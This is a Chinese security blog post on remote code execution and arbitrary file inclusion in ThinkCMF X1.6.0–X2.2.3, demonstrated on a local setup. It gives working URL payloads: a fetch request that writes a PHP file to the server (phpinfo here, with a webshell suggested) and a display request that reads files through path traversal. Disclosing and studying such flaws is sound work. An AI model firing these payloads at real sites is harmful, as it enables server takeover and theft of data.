更多内容,欢迎关注微信公众号:信Yang安全,期待与您相遇。

ThinkCMF是一款基于PHP+MYSQL开发的中文内容管理框架,底层采用ThinkPHP3.2.3构建。
ThinkCMF提出灵活的应用机制,框架自身提供基础的管理功能,而开发者可以根据自身的需求以应用的形式进行扩展。
每个应用都能独立的完成自己的任务,也可通过系统调用其他应用进行协同工作。在这种运行机制下,开发商场应用的用户无需关心开发SNS应用如何工作的,但他们之间又可通过系统本身进行协调,大大的降低了开发成本和沟通成本。
影响版本:
ThinkCMF X1.6.0
ThinkCMF X2.1.0
ThinkCMF X2.2.0
ThinkCMF X2.2.1
ThinkCMF X2.2.2
ThinkCMF X2.2.3
本地环境搭建:

搭建完成后如下图

第一种:

通过构造a参数的fetch方法,可以不需要知道文件路径就可以把php代码写入文件,这里写入phpinfo,当然这里可以直接写webshell拿管控权限,payload:

?a=fetch&templateFile=public/index&prefix=''&content=<php>file_put_contents('test.php','<?php phpinfo(); ?>')</php>

访问写入的文件http://127.0.0.1/thinkcmfx/test.php

第二种

通过构造a参数的display方法,实现任意内容包含漏洞,payload:

/?a=display&templateFile=README.md

跨路径读取

http://127.0.0.1/thinkcmfx/?a=display&templateFile=../../../../../../yangyyy.txt

更多内容,欢迎关注微信公众号:信Yang安全,期待与您相遇。

最新文章

  1. ZOJ3791_An Easy Game
  2. Python开源框架
  3. 一篇学习HTTP状态码的神文:我与依依的橙色岁月
  4. cpu和memory性能监控
  5. Expression&lt;Func&lt;T, bool&gt;&gt;
  6. PDO数据库
  7. javascript获取ckeditor编辑器的值(实现代码)
  8. ios进行打包
  9. Erlang中的图形化检测工具(4)
  10. Java命令模式以及来自lambda的优化
  11. 腾讯Java程序员第二轮面试11个问题,你会几个?
  12. nodejs爬虫笔记(三)---爬取YouTube网站上的视频信息
  13. Connector for Python
  14. ABP模块运行解析
  15. nvm npm node
  16. 设计模式之Factory(工厂)(转)
  17. window.open打开新窗口报错ie 位指明错误,原因是window没有加引号!
  18. e814. 创建一个可监听选择状态的菜单项
  19. 2017萧山第5场(2016 Pacific Northwest - Division 1)
  20. HDUOJ-----2838Cow Sorting(组合树状数组)

热门文章

  1. C语言合并果子-贪心算法
  2. 开灯问题—C语言
  3. go 程序整个执行过程
  4. 解决centos7下 selenium报错--unknown error: DevToolsActivePort file doesn&#39;t exist
  5. S/4HANA Service Management和SAP Field Service Management的集成
  6. 肖哥HCNP-正式篇笔记
  7. job和cronjob的使用
  8. 使用Cloudera Manager添加Sentry服务
  9. 【Audiophobia UVA - 10048 】【Floyd算法】
  10. 使用laravel jwt-auth post提交数据一直出现 &#39;error&#39; =&gt; &#39;invalid_credentials&#39;